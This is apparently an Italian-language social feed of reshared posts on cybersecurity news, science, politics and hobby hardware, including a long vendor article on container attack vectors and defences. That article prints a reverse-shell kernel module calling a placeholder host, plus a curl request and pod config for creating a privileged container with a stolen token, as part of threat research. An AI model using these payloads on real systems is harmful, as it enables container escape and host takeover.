Cybersecurity & cyberwarfare ha ricondiviso questo.

CVE-2026-8732: The WP Maps Pro Flaw That Lets Anyone Create a #WordPress Admin Without a Password
securityaffairs.com/192977/hac…
#securityaffairs #hacking
Cybersecurity & cyberwarfare ha ricondiviso questo.

Gli scienziati hanno scoperto che l'integratore di creatina che milioni di persone assumono per aumentare la massa muscolare aumenta silenziosamente i livelli di energia cerebrale e rallenta del 30% i


Decine di milioni di persone assumono creatina ogni giorno.. L'hanno comprato per i loro muscoli. Misurano le loro dosi in base a quanto peso possono aggiungere a una distensione su panca o alla velocità con cui recuperano tra un set e l'altro. Quasi nessuno di loro sa che lo stesso integratore attraversa la barriera ematoencefalica, aumenta i livelli di fosfocreatina nei neuroni e influisce sulle funzioni cognitive in modo tale che l'industria del fitness non ha mai pubblicizzato e alla maggior parte degli utenti non è mai stato detto.

thesciverse.org/scientists-fou…

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

Esce oggi la nuova puntata del postcast "Tra le righe del cielo" con Elisa Nichelli ed il sottoscritto alla voce. Stavolta esploriamo insieme cosa accade nell’istante geometrico preciso in cui la luce, dopo essere cresciuta al massimo, inizia la sua silenziosa ritirata.

Questa inversione di rotta diventa il pretesto perfetto per tuffarci in tutto ciò che è sommerso, invisibile e nascosto, tanto sopra quanto dentro di noi.

Se l'astrofisica moderna ci svela che solo il 4% dell'Universo è fatto della materia visibile che conosciamo — lasciando il resto all'abbraccio misterioso di materia ed energia oscura — la medicina e la psicologia ci restituiscono uno specchio identico: la nostra coscienza è solo un sottile strato di luce sopra un oceano di attività cerebrale inconscia, così come la stragrande maggioranza del nostro DNA è composto da regioni non codificanti ancora tutte da decifrare.

Insomma un viaggio "oltre le colonne d'Ercole" verso ciò che non si conosce e perciò stimola la nostra curiosità (e desta spesso la nostra meraviglia).

La puntata è ascoltabile su tutte le principali piattaforme podcast.

youtu.be/s5c3tpfYPg4?si=YDvbsG…

#tralerighedelcielo #podcast #inaf

Digital Politics at 100: What I got wrong


The media in this post is not displayed to visitors. To view it, please log in.

Digital Politics at 100: What I got wrong
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be speaking at an online event about social media data access and attacks on independent research, organized by Columbia World Projects, the Centre for Digital Governance at the Hertie School and Tech Policy Press. It's at 16:00 CET / 10:00 ET on June 18. You can register here.

This week's edition marks Digital Politics' 100th newsletter. That's just under 260,000 words over 22 months on everything from Europe's stuttering digital rulebook to the United States' quixotic take on tech to the rise of the Middle Powers movement.

Not everything I've written stood the test of time. So I went back over the last two years to figure out what I got wrong, and why. Call it a mea culpa. Digital policymaking moves fast and the geopolitics have only grown more complex since 2024.

Thank you for reading along the way. I started this newsletter to understand what was going on around me. I find the weekly dispatches a useful way of framing my thinking. I hope you also find it useful.

Let's get started:



digitalpolitics.co/what-i-got-…

Reverse Engineering A Rock Bottom NES Clone


The media in this post is not displayed to visitors. To view it, please log in.

The NES was Nintendo’s smash hit console of the 1980s, the international version of their Japanese Famicom system. It wasn’t a particularly complex device, so it was the subject of many clones back in the day. More recently, it has enjoyed a new life thanks to “NES on a chip” systems. It’s one of these that [Poking Technology] has, real rock bottom for the console built into a cheap phone case.

Reverse engineering the thing starts with disassembly, upon which the brain of the unit is revealed as a mystery resin blob chip. There’s a ROM which, with a little effort, [Poking Technology] dumps. ROM analyses in situ requires quite a bit more effort. He identifies the black blob as a VT369 NES-on-a-chip and thus deduces that part of the device’s code is hidden in the chip’s 4K ROM. Some investigation and code injection allows him to control the backlight, from which he can dump the internal ROM by flashing it on and off.

The video is a very long one, but along the way you can learn a lot about the operation of these devices. What strikes us is that these ICs may be a NES, but just like the original, they have potential as a versatile computer beyond Mario. We won’t be ordering a NES phone case, but we can see they have potential.

youtube.com/embed/zL0WA-rRssw?…

Thanks [Anebix] for the tip!


hackaday.com/2026/06/01/revers…

L’infrastruttura dei call center fraudolenti: come funziona e come difendersi


@Informatica (Italy e non Italy)
Una ricerca di Cisco Talos identifica i numeri telefonici come indicatori di compromissione utili per mappare le reti criminali che spostano intenzionalmente le vittime dalle comunicazioni scritte alle conversazioni vocali affidate a call center fraudolenti
L'articolo L’infrastruttura dei call center

Containers on fire: from container escapes to supply chain attacks


The media in this post is not displayed to visitors. To view it, please log in.


Introduction


Modern infrastructures universally rely on containerization to deploy applications, scale services, and build cloud platforms. The use of Docker, Kubernetes, and similar technologies has become the corporate standard for efficient automation. However, as containers grow in popularity, so does the interest of malicious actors — a trend we actively track in our research into advanced cyberthreats. For instance, in one of its recent attacks, the APT group TeamPCP compromised Checkmarx KICS across multiple attack chains for different vectors. This included poisoning a Docker Hub repository to later steal Kubernetes secrets and other sensitive data. The tainted images distributed a stealer that was loaded during the KICS scanning process.

Today, attacks on container environments have evolved into full-fledged, multi-stage scenarios involving supply chain compromises, Kubernetes secrets theft, orchestration API abuse, and container escape attempts. This article examines the primary container attack vectors that retain top relevance today.

Principles of containerization


A container is an isolated code execution environment, designed to partition resources so applications can run correctly and independently. Unlike a virtual machine, a container uses the single underlying kernel of the host operating system.

To isolate the environment, a container uses a distinct process namespace and a virtual file system. Container resources are capped and shared with the host system. This container isolation is built on top of Linux kernel features such as namespaces, cgroups, capabilities, and seccomp.

Compromising a container can help attackers achieve their objectives on the host system itself. Below, we examine the current vectors relevant to container implementation architecture and infrastructure.

Current attack vectors


The primary and most critical attack vectors targeting container environments that are actively exploited by malicious actors include:

  • Exploiting vulnerabilities in the host system and container runtime components
  • Malicious activity inside a compromised container
  • Container escape followed by host compromise
  • Exploiting misconfigurations and the insecure use of containerization and orchestration APIs
  • Supply chain attacks, including container image poisoning and CI/CD pipeline compromise

Each of these vectors can be utilized either independently or as part of a complex, multi-stage attack chain. In practice, attackers rarely stop at compromising a single container; their primary objective is often to gain access to the Kubernetes cluster, secrets management systems, or other mission-critical environment components. This is why securing container infrastructure requires a comprehensive approach that spans configuration auditing, runtime protection, activity monitoring, and software supply chain security. Let’s take a closer look at each of these vectors.

Exploiting host system vulnerabilities


Because a container does not have its own isolated OS, vulnerabilities affecting the Linux kernel or runtime components remain just as critical when exploited from within a container.

Any vulnerability that allows for privilege escalation, arbitrary code execution, or isolation bypassing can potentially be leveraged by an attacker once the container is compromised. Successful exploitation of these flaws can lead to a container escape, compromise of the Kubernetes node or the entire cluster, lateral movement across the infrastructure, secrets theft, and malicious actions potentially culminating in a complete service disruption. It is worth noting that the mere presence of a vulnerability does not always guarantee a compromise, as exploitation sometimes requires specific configuration settings or privileges to work.

Below are examples of several vulnerabilities leveraged in attacks on container environments:

  • CVE-2019-5736 is one of the most prominent and illustrative vulnerabilities associated with containerization. It affected the runC runtime environment and allowed an attacker, who already had root access inside the container, to execute arbitrary code on the host system with root privileges. The root cause of the vulnerability was runC’s improper handling of the file descriptor for its own executable via the /proc/self/exe mechanism. When a container was started, the runC process temporarily executed within the container’s context while remaining a host system process. This allowed an attacker to gain access to the runC binary and overwrite its contents.
  • CVE-2022-0492 is a critical Linux kernel vulnerability that allows for container escape and arbitrary command execution on the host system. The flaw stemmed from improper privilege validation when interacting with the cgroups release_agent mechanism. This vulnerability posed a particular risk for container infrastructures because it allowed an attacker who already possessed code execution capabilities inside a container to break out of isolation and gain control of the host system.
  • CVE-2024-21626 is a critical vulnerability in runC that allowed an attacker to access the host file system from within a container, and in specific scenarios, even perform a complete container escape. The root cause of the issue was runC’s improper handling of file descriptors and the process’ current working directory when spinning up containers or executing commands via docker exec or similar mechanisms.


Malicious actions inside the container


Sometimes, an attacker does not need to exploit complex attack chains involving container escapes, Kubernetes cluster compromise, or lateral movement to achieve their goals. In many cases, the container itself already houses data and resources that are highly valuable to the attacker. For example, a container may contain:

  • User and service credentials
  • API keys
  • Access tokens
  • SSH keys
  • Environment variables containing secrets
  • Kubernetes ServiceAccount tokens
  • Configuration files
  • Application service data or databases

These types of data are especially prone to exposure due to configuration mistakes or specific operational processes. For instance, secrets might be passed via environment variables, baked into Docker images during the build phase, or mounted directly inside the container. In Kubernetes environments, automatically mounted ServiceAccount tokens are of particular interest to attackers, as they provide a direct pathway to interact with the Kubernetes API.

Even a single compromised container frequently provides an attacker with sufficient leverage for next steps: gaining access to external services, compromising cloud infrastructure, stealing user data, impersonating a trusted service, or establishing persistence within the environment. Beyond data theft, malicious actors can use a compromised container as a staging ground for further malicious activity. This is why securing container infrastructure is about much more than just preventing escapes. Even a fully isolated container, if it houses sensitive data or holds access to internal services, can become a major foothold for an infrastructure breach.

In the context of this vector, approaches and techniques applicable not only to container environments but also to traditional systems are frequently applied. Once an attacker gains access to a container, they usually find themselves in a full-featured Linux environment, allowing them to deploy standard post-exploitation, reconnaissance, and persistence methods.

We explored container configuration errors and other unsafe practices that attackers could exploit to carry out malicious activities in more detail in this article.

Container escape


Container escape is one of the most dangerous and prevalent attack vectors targeting container infrastructure. The term refers to the bypassing of container isolation, allowing an attacker to directly interact with the host system.

The opportunity to escape a container can arise from a multitude of sources: the exploitation of vulnerabilities, container misconfigurations, or the insecure use of containerization and orchestration APIs. Indeed, container escape is the logical conclusion of most attacks on container infrastructure, as the attacker’s ultimate goal is frequently to break out of the isolated environment and gain access to the host system or the broader Kubernetes cluster. As such, container escape ties together a significant portion of the attack vectors discussed in this article. In practice, misconfigurations remain one of the most common root causes of successful container escapes, as they occur far more frequently than the exploitation of complex vulnerabilities. With that in mind, we will take a closer look at container misconfigurations and their associated attack scenarios below.

To better understand the risks associated with container misconfigurations, let’s explore the concept of capabilities in Linux systems. This is a mechanism for granularly granting extended permissions to processes, allowing them to perform privileged actions without needing full root access.

Privileged containers


One of the most dangerous configurations is running a container with the --privileged flag. In this mode, the container is granted all Linux capabilities, direct access to host devices, and the ability to interact with kernel interfaces. A container configured this way virtually ceases to be an isolated environment and, in many cases, possesses capabilities comparable to root access on the host system.

Let’s look at a basic example of a container escape attack involving the --privileged flag. Using the capsh utility, you can see that such a container possesses virtually all Linux capabilities. Furthermore, if the PID namespace matches the host’s, the process with PID=1 corresponds to init, the first system process in Linux. In a different configuration, PID 1 would belong to the process that created the container. If we spawn a shell from the init process using the nsenter utility, the expected behavior is the creation of a process outside the container, which can easily be verified by using the hostname command.


Container privilege misconfigurations open up a broad attack surface. Let’s dive deeper into how specific capabilities can be used to execute a container escape.

CAP_SYS_ADMIN


CAP_SYS_ADMIN is considered one of the most dangerous Linux capabilities in the context of container security. Although Linux capabilities were originally intended to break down superuser privileges into discrete categories, over time, CAP_SYS_ADMIN became a catch-all for a massive number of sensitive kernel operations. As a result, a container granted this capability gains access to a wide array of system mechanisms that directly impact container isolation. It inherits the ability to mount file systems, interact with the cgroups mechanism responsible for resource allocation, modify kernel parameters within certain limits, work with loop devices, and utilize various namespace management features. In practice, this heavily blurs the line between the container and the host system.

This capability becomes especially dangerous when combined with other configuration errors. For instance, if the container is configured to use the hostPath parameter, an attacker can leverage a container compromise to mount the host system’s directories right into their own environment and access critical host files. Similarly, having access to /proc or /sys allows for direct interaction with internal Linux kernel mechanisms, which can drastically expand the blast radius of the breach.

Let’s look at a clear example of how having CAP_SYS_ADMIN can help an attacker escape a container. Illustrated below is the sequence of actions inside a container possessing CAP_SYS_ADMIN privileges and access to host directories. By mounting the host’s disk to a folder inside the container, the attacker can freely interact with all files on the host system. In this specific example, it shows the ability to overwrite the root user’s shell configuration by injecting an arbitrary malicious payload.


CAP_SYS_MODULE


CAP_SYS_MODULE provides direct access to the kernel module loading and unloading mechanism. This direct interaction with kernel space makes CAP_SYS_MODULE a high-risk capability, unlike many other capabilities that are restricted purely to user space.

From a Linux architectural standpoint, kernel modules consist of code executing with maximum privileges inside kernel space. These modules can extend system functionality, manage devices, handle the network stack, interface with file systems, and control other mission-critical components. This is why the ability to dynamically load these modules via CAP_SYS_MODULE equates to having the power to manipulate the behavior of the entire operating system.

In practice, modern containerized applications rarely require CAP_SYS_MODULE. The presence of this capability is typically tied to legacy architectures, monitoring systems, or specialized drivers that must interact directly with the kernel. This is why CAP_SYS_MODULE is almost universally banned in modern infrastructures. In most environments, it is considered an unacceptable risk because its compromise does not just lead to localized privilege escalation within the container, but to code execution directly in kernel space.

A container escape using this capability happens in several stages. The goal of the attack in this case is to load a malicious Linux kernel module. It is worth noting that the module must match the specific kernel version in use, requiring the attacker to perform additional reconnaissance to identify it. These attacks can be executed entirely within the container if it contains the necessary build tools to compile the module and has access to kernel dependency directories. However, because these utilities are typically stripped from container images, attackers usually compile the malicious payload with the required dependencies on an external host. They then either transfer it over the network or drop it into a binary file on the target by using a command like echo.

Let’s look at a container escape using a kernel module with the following payload example:
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("Test");
MODULE_AUTHOR("Test");
MODULE_DESCRIPTION("reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/<IP>/<Port> 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Upon loading, this module triggers the reverse shell. Once the payload is built and successfully delivered to the container, all the attacker needs to do is start a listener on the IP address and port specified in the payload, and then load the module into kernel space.


CAP_SYS_PTRACE


The CAP_SYS_PTRACE capability grants a process elevated permissions to interact with other system processes via the ptrace system call. While it is designed for debugging and code tracing, its misconfiguration in containerized environments can severely weaken isolation and, under certain conditions, enable a container escape leading to host system compromise.

The primary risk of CAP_SYS_PTRACE is that it allows a process to read and modify the memory of other processes, control their execution, inject code, and extract sensitive data directly from memory. Furthermore, CAP_SYS_PTRACE enables process injection techniques.

If a container is compromised, an attacker can use ptrace to attach to host processes. Crucially, this is only possible if the host’s PID namespace is shared with the container — this is configured via hostPID: true. This configuration allows the attacker to target a process running on the host, inject code, and trigger a reverse shell — though in most cases, this requires additional malicious code. The image below demonstrates this kind of an attack, implemented using a publicly available PoC.


CAP_NET_ADMIN


CAP_NET_ADMIN provides extensive privileges to manage the network stack of a Linux system. If a container is compromised, the presence of this capability significantly weakens network isolation and creates additional opportunities for further exploitation.

A container equipped with CAP_NET_ADMIN can modify network interface configurations, manipulate routing tables, interact with traffic filtering mechanisms, and alter the behavior of the network stack. Although most of these operations are formally restricted to the container’s own network namespace, in practice, this capability is frequently combined with other misconfigurations — such as the hostNetwork: true parameter — which grants direct access to the host’s network resources.

Once inside the container, an attacker can leverage this capability to modify its network behavior and launch further attacks across the infrastructure. One of the most common scenarios involves manipulating iptables rules to redirect traffic. This enables man-in-the-middle (MitM) attacks, allowing the attacker to intercept internal traffic or mask their own malicious activities.

It is important to emphasize that there are many other Linux capabilities that can lead to a container escape when combined with specific misconfigurations; we have highlighted only a few of the most severe and frequently encountered.

Exploitation of orchestration APIs


One of the most dangerous and common attack vectors in containerized infrastructure is the exploitation of misconfigured container management and orchestration APIs. Unlike attacks that require complex kernel vulnerability exploits or container escape, this scenario is often remarkably straightforward: the attacker simply needs to gain access to the control interfaces of the container environment.

The fundamental risk stems from the fact that container platform APIs possess inherent administrative privileges over the entire infrastructure. The Docker API, Kubernetes API, and kubelet API are designed to spin up containers, modify configurations, access host file systems, and execute commands inside running containers. When misconfigured, these interfaces immediately become a point of failure for the entire environment.

One of the most notorious examples of this vector is an exposed Docker API. If the Docker daemon is accessible over TCP without TLS or authentication, an attacker can remotely interact with the host system with permissions equivalent to a local administrator. They can deploy new containers custom-configured for attacks, mount the host’s entire root file system, and execute arbitrary commands within any container via the API. In practice, compromising an unauthenticated Docker API typically leads to a complete host takeover after just a few API requests.

Similar risks exist within Kubernetes environments. The Kubernetes API server acts as the central control point for the entire cluster. If an attacker manages to compromise a ServiceAccount token, exploit weak RBAC policies, or discover an inadvertently exposed API server, they can execute a broad spectrum of destructive operations.

For the sake of this attack example, let us assume that an attacker has compromised a Kubernetes API token for a privileged account. First, they enumerate the token’s permissions, typically by running a script to query each individual capability. This gives them a full list of Kubernetes privileges.

The script’s output reveals that the compromised API token grants exceptionally high privileges within the cluster. The logical next step in the attack chain is to deploy a malicious, privileged container to execute any of the host escape techniques described above. In our example, the attacker used a curl POST request to the API to create the container:
curl -k -X POST https://<kubernetes-url>/api/v1/namespaces/default/pods -H "Authorization: Bearer <Token>" -H "Content-Type: application/json" -d @pod.json

The configuration passed in the pod.json file is explicitly designed to enable an escape:

{
"apiVersion": "v1",
"kind": "Pod",
"metadata": {
"name": "privileged-pod-from-api"
},
"spec": {
"containers": [
{
"name": "debug-container",
"image": "ubuntu:latest",
"command": ["sleep", "3600"],
"securityContext": {
"privileged": true
}
}
]
}
}

Once the privileged container is deployed, the attacker can execute an escape to compromise the underlying host system.

However, this is not the only high-risk scenario involving API requests. For instance, when a Docker socket is mounted inside a container, an attacker gains the ability to interact with the Docker daemon directly. Once that container is compromised, the attacker effectively inherits the privileges of the daemon, which means they gain control over all containers on the host.

To execute the attack, adversaries look for containers with mounted sockets. The further progression of the attack replicates what has been described above: an API request is made to create a privileged container, after which any escape method is similarly exploited using the API.


Supply chain attacks


Unlike classic attacks aimed at exploiting vulnerabilities in already deployed containers, this approach focuses on compromising components before they are even launched in the runtime environment. Modern container infrastructure is tightly integrated with a large number of external components. As a result, container security directly depends not only on the application itself, but on the entire image build and delivery chain. Compromising any of these stages potentially allows an attacker to inject malicious code into multiple containers and services simultaneously.

One of the most common scenarios involves attacks that contaminate container images. In many organizations, developers use public images from Docker Hub or other available sources without a full verification of their origin or contents. Threat actors frequently publish contaminated images that masquerade as popular services and utilities. Once a container like that is launched within the infrastructure, the attacker gains the ability to execute their own code right inside the organization’s trusted environment.

Furthermore, CI/CD container deployment systems are among the most frequent targets of these attacks. Application build and delivery platforms typically possess elevated privileges. For instance, after gaining access to a CI/CD system, an attacker can covertly modify the Docker image build stages. Instead of altering the application’s source code, the attacker can inject the malicious logic directly into the pipeline itself. An additional command during the build process can download a third-party binary, add a hidden script, modify the container configuration, or implant a remote management mechanism. Externally, the container will look completely legitimate because its core functionality remains unchanged.

Takeaways


Overall, modern attacks on container environments demonstrate that the primary threat arises not just from within the container itself, but from the implementation of the container infrastructure as a whole. Containers are frequently exploited as an initial foothold to establish persistence within a system; following an initial compromise, attackers aim to either escalate to the host OS level or gain control over infrastructure management via containerization and orchestration APIs. To achieve this, they exploit weak configurations, excessive capabilities, and isolation flaws.

Furthermore, there is a visible trend of attacks shifting toward CI/CD pipelines, where compromising a single component can lead to a full infrastructure takeover. Therefore, under current realities, securing containerized environments requires an approach that encompasses host protection, strict access control within the orchestrator, minimization of container capabilities, and comprehensive validation of the entire supply chain. Our solution Kaspersky Container Security has been designed with the specific characteristics of container environments in mind and provides protection at various levels from container images to the host system helping to implement the principles of secure software development.


securelist.com/container-attac…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Per non dimenticare mai chi è Meta, ricordiamo che l'azione legale del gigante Social, ha recentemente costretto la whistleblower Sarah Wynn-Williams a sedersi in silenzio al festival di Hay

Gli avvocati di Zuckerberg hanno avvertito che in caso contrario ci sarebbero state possibili richieste di risarcimento danni

@informatica

theguardian.com/technology/202…

in reply to informapirata ⁂

Wynn-Williams, ex dirigente di Facebook, ha dovuto affrontare crescenti restrizioni legali dopo la pubblicazione, lo scorso anno, di Careless People, che contiene accuse sulla cultura interna e sul processo decisionale di Meta, tra cui affermazioni relative all'influenza politica, all'approccio dell'azienda nei confronti della Cina e preoccupazioni circa il benessere dei suoi utenti bambini. Meta ha contestato le affermazioni del libro.

@informatica

in reply to informapirata ⁂

perché a Facebook è stato permesso di comprare Instagram e Whatsapp, ma pure come mai è stato permesso a Google di comprare Youtube, o ad Amazon di comprare Twitch.

perché si è lasciato a questi giganti il permesso di diventare sempre più giganti e creare un oligopolio?

tutto parte da quando Bush lasciò cadere il caso per separare Microsoft nel 2001?

Questa voce è stata modificata (2 settimane fa)

informapirata ⁂ reshared this.

Cybersecurity & cyberwarfare ha ricondiviso questo.

Cosa stai aspettando? Meta lancia abbonamenti a Instagram, Facebook e WhatsApp, e altri in arrivo, inclusi i piani di intelligenza artificiale

Per pochi dollari al mese, i consumatori che si abbonano a Instagram Plus (3,99 $/mese), Facebook Plus (3,99 $/mese) o WhatsApp Plus (2,99 $/mese) avranno accesso a funzionalità extra, come la personalizzazione del profilo, super reazioni, approfondimenti sulle storie e, soprattutto, STICAZZI.

techcrunch.com/2026/05/27/meta…

@informatica

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Quando la censura si rivela: il test su Tiananmen che mostra come funziona DeepSeek

📌 Link all'articolo : redhotcyber.com/post/quando-la…

A cura di Simone D'Agostino

#redhotcyber #news #storiaCinese #piazZatiananmen #libertàDiEspressione #riformePolitiche

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

CVE-2026-41089: Windows Netlogon 0-Click RCE Now Actively Exploited — Patch Domain Controllers Immediately
#CyberSecurity
securebulletin.com/cve-2026-41…
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Meta AI Flaw Lets Attackers Hijack Instagram Accounts Without Verification — Premium Handles Worth $1M+ Stolen
#CyberSecurity
securebulletin.com/meta-ai-fla…
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Massive Supply Chain Attack: Poisoned VS Code Extension and “Megalodon” Campaign Steal Credentials from Millions of Developers
#CyberSecurity
securebulletin.com/massive-sup…
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Hackers Are Calling You on Microsoft Teams Pretending to Be IT Support — How to Detect and Stop the Attack
#CyberSecurity
securebulletin.com/hackers-are…
Cybersecurity & cyberwarfare ha ricondiviso questo.

U.S. CISA adds Palo Alto Networks PAN-OS flaw to its Known Exploited Vulnerabilities catalog
securityaffairs.com/192951/sec…
#securityaffairs #hacking
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

💥🚨 FLASH SALE: -10% FINO AL 7 GIUGNO PER L'OTTAVA LIVE CLASS "DARKWEB & CYBER THREAT INTELLIGENCE" IN PARTENZA A LUGLIO

QUATTRO LEZIONI PER COMPRENDERE IL DARKWEB ED ENTRARE DA PROTAGONISTI NELLA CYBER THREAT INTELLIGENCE.
Per info e iscrizioni: 📱 💬 379 163 8765 ✉️ formazione@redhotcyber.com

✅ Pagina del corso: redhotcyber.com/linksSk2L/acad…
✅ Presentazione del corso del prof. Pietro Melillo : youtube.com/watch?v=9VaQUnTz4J…
✅ Webinar introduttivo di presentazione al corso : youtube.com/watch?v=ExZhKqjuwf…
✅ Workshop di DarkLab alla RHC Conference 2026 : youtube.com/watch?v=yE1Li3TS5B…

#redhotcyber #formazione #formazioneonline #ethicalhacking #cti #cyberthreatintelligence #cybersecurity #cybercrime #cybersecuritytraining #cybersecuritynews #privacy #cti #cyberthreat #intelligence #infosec #corsi #corsiprartici #liveclass

Classically-named Argus Robot Is Terminator Meets Tumbleweed


The media in this post is not displayed to visitors. To view it, please log in.

If you were making a multi-limbed symmetric nightmare of a robot, where else would you look for a name but Greek Mythology? The team at Duke University that came up with this particular multi-limbed creature had two obvious choices: name it for one of the Hundred-Handed giants, the Hecatoncheires, or lean on the fact that each limb has its own sensor and go for many-eyed Argus. Argus sounds better to a funding committee, so Argus it is.

Hecatoncheries would be a bit of a reach anyway, considering Argus only has 20 limbs in its current incarnation. It uses what the researchers are calling its ‘dynamic symmetry’ to get around– extending and retracting its many limbs to exert forces in any direction, it can bounce about like a beach ball on a windy day.

At least in the embedded demo video, it seems to work surprisingly well. If you want to try it for yourself but don’t have a robot-building research grant, you’re in luck. The team at Duke has an open-source simulator available on GitHub so you can explore the concept, including trying variants with more and fewer legs than the 20-limbed unit featured here. Given that it works with only a dozen effectors, you can imagine the Argus we see has a certain degree of redundancy, something funder DARPA is doubtless keen on.

It is an oddball idea, and something we might imagine seeing in Star Wars, but it’s obviously got its pluses. We can’t really imagine any of the humanoid robots we’ve seen doing parkour like this thing. Somehow it’s less creepy than the robot dogs that are becoming common — along with being security risks.

youtube.com/embed/Nd-I4YNQEuY?…


hackaday.com/2026/06/01/classi…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Workshop "skill-on" RHC Conference 2026 - Ransomware E-Volution

Guarda il video: youtube.com/watch?v=yE1Li3TS5B…

#redhotcyber #rhcconference #conferenza #informationsecurity #ethicalhacking #dataprotection

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Phishing SMS per ATAC: come evitare pagamenti di 1,50 euro senza timbrare il biglietto

📌 Link all'articolo : redhotcyber.com/post/phishing-…

A cura di Luigi Zullo

#redhotcyber #news #phishing #sms #atac #sicurezzainformatica #hacking #truffeonline

Cybersecurity & cyberwarfare ha ricondiviso questo.

Nei Paesi Bassi raddoppieranno il numero di controlli automatico delle infrazioni.


Autovelox, controllo della velocità media, semaforo rosso, addirittura l'uso del telefono alla guida: questi sono alcune delle infrazioni oggetto dell'espansione più grande dei sistemi di rilevamento automatico nei #PaesiBassi. Questi interventi si concentreranno in ambito urbano, dove gli utenti vulnerabili sono più in pericolo, compreso il controllo di velocità in zone con limite a 30 km/h.

Praticamente hanno preso il #codiceDellaStrage del nostro ministro per l'incidentalità stradale #Matteo e hanno fatto tutto il contrario.

@energia #violenzaStradale

etsc.eu/netherlands-to-more-th…

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Traffico di droga nel salernitano. Smantellata organizzazione italo-croata


Un gruppo di criminalità organizzata attivo nell'area di Salerno è stato smantellato a seguito di operazioni congiunte delle autorità italiane e croate, coordinate da Eurojust. Le indagini hanno rivelato la vasta gamma di attività illecite da cui il gruppo traeva profitto, tra cui traffico di droga, traffico di armi e favoreggiamento dell'immigrazione clandestina. Il leader dell'organizzazione è riuscito a dirigere le attività pur trovandosi in un carcere.

Durante le operazioni condotte in Italia e in Croazia, sono stati arrestati 23 sospetti, tra cui un trafficante di armi croato coinvolto nelle attività criminali. Le indagini hanno evidenziato la natura policriminale del gruppo. L'attività principale era il traffico di droga nella zona del Sarno e di Scafati; si stima che abbiano trafficato centinaia di chili di cocaina. Per controllare il territorio, i membri del gruppo avrebbero acquisito diverse armi, praticato estorsioni e commissionato atti violenti a scopo di intimidazione.

Per aumentare i profitti illegali, il gruppo si è anche dedicato al favoreggiamento dell'immigrazione illegale creando falsi contratti di lavoro. Sono state presentate con successo oltre 1.000 domande per permessi di lavoro o ricongiungimento familiare.

Le attività del gruppo erano guidate da un sospettato attualmente in carcere. Nonostante la detenzione, è riuscito a istruire i membri del gruppo, indicando quali imprenditori estorcere e ordinando atti violenti per imporre i pagamenti o risolvere le controversie. Il sospettato ha anche ordinato un'aggressione violenta contro un altro detenuto, con l'obiettivo di costringere la vittima a condividere la sua cella per poter utilizzare il telefono cellulare di quest'ultimo e dirigere il gruppo criminale.

Le autorità italiane e croate, collaborando tramite la coordinazione di #Eurojust, sono riuscite a identificare un sospettato che aveva fornito armi al gruppo criminale. Questo canale di approvvigionamento ha permesso ai membri del gruppo di acquistare diverse armi, tra cui fucili d'assalto AK-47. In precedenza, un veicolo che trasportava armi dalla Croazia all'Italia era stato intercettato, portando all'arresto del responsabile e al sequestro di numerose armi e munizioni.

Le azioni successive delle autorità italiane e croate hanno portato all'arresto di 23 sospetti, 19 dei quali sono attualmente in custodia cautelare, mentre gli altri sono agli arresti domiciliari. Nei confronti di un sospettato croato è stato emesso un mandato di arresto europeo, preparato da Eurojust.

Le operazioni sono state condotte dalle seguenti autorità:

  • Italia: Procura della Repubblica di Salerno; Servizio Centrale Operativo della Polizia di Stato
  • Croazia: Procura Speciale Croata (USKOK – Ufficio per la repressione della corruzione e della criminalità organizzata); Ufficio del Procuratore della Contea di Zagabria

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

The #Pentagon Finally Admits That Location Data Is a Battlefield Problem
securityaffairs.com/192942/cyb…
#securityaffairs #hacking
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Scopri come la scadenza dei certificati Secure Boot colpirà i tuoi dispositivi Windows

📌 Link all'articolo : redhotcyber.com/post/scopri-co…

A cura di Carolina Vivianti

#redhotcyber #news #microsoft #windows #secureboot #windowsupdate #sicurezzainformatica

Making a Zippy FDM Printer out of Wood


The media in this post is not displayed to visitors. To view it, please log in.

Generally, the frame and other structural parts of an FDM printer use steel or similar, but could you use wood instead for that truly artisan look? As [Mitsu Makes] demonstrates after half a year of work, you absolutely can, and it looks about as amazing as you might imagine.

Naturally, you cannot make everything out of wood – such as the linear rails and lead screws – and there is a fair bit of FDM-printed black PLA in there too, but the wood is both structural and decorative. The stained look does really add something. For the FDM-specific parts, the Voron 0 was taken as the base, including the bed. The motion system isn’t CoreXY but Cartesian for ease of construction and driving the axes, while also providing more torque due to the additional motors.

Since it’s more or less a Voron FDM printer and even has automatic bed leveling, it works basically perfectly after assembly and input shaping. Even if it’s not the most practical way to make your own FDM printer from parts, it definitely makes it look unique and would be the focal point of any printing farm.

youtube.com/embed/OjoM74ADkYg?…


hackaday.com/2026/05/31/making…

Off-Grid OCR Server Powered by iPhone


The media in this post is not displayed to visitors. To view it, please log in.

